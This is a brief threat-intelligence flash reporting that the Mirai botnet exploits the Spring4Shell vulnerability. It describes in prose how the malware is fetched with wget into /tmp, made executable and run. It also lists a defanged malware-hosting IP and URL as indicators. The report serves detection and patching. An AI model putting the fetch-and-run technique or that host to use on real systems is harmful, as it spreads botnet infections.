Threat Intel Flash: Sisense Data Compromise: ARC Labs Intelligence Flash

Get the Latest


Spring4Shell CVE-2022-22965 Weaponized by Mirai Botnet

Researchers at Trend Micro Threat Research have observed active exploitation of the Spring4Shell vulnerability for the purpose of weaponizing and executing Mirai botnet malware. Spring4Shell (CVE-2022-22965) is a recently discovered vulnerability in the Spring Framework, a popular Java development platform. You can find our previous coverage of this vulnerability here.

Trend Micro researchers observed this adaptation of the Mirai botnet in early April in the Singapore region. The exploitation of the Spring Framework vulnerability allowed the Mirai operators to retrieve their malware from their own infrastructure using ‘wget’ to download the malicious executable into the ‘/tmp’ folder, change its permissions with ‘chmod’, and execute it. Multiple CPU architecture variants were also observed on the malware file server, including ARM, x86, and MIPS among others. Interestingly, the malicious script used to download the malware to the victim server downloads all of the available CPU architecture variants and attempts to run them all. The compatible ones will run, while the rest won’t. The files are all then removed after execution.

Analyst Notes

It is highly recommended that any system using the Spring Framework be patched to the most recent versions. You can find our coverage of the patches here.

Attackers are becoming faster and faster at integrating the exploitation of new vulnerabilities to expand the virulence of their malware, especially in such cases as botnets. It is more important than ever to maintain a progressive patch cycle.

As seen in a vast number of attacks, the usage of ‘wget’ and ‘curl’ are very popular ways for an adversary to easily download their malware onto target systems. Unless there is a specific need for those tools, it is highly recommended that their installation and usage are heavily restricted.

Among other IOCs provided by Trend Micro in their report, the IP and URL that they discovered housing various versions of the malware would be useful and actionable items to look for in a network.

• 45.95.169[.]143
• http://45.95.169[.]143/The420smokeplace[.]dns/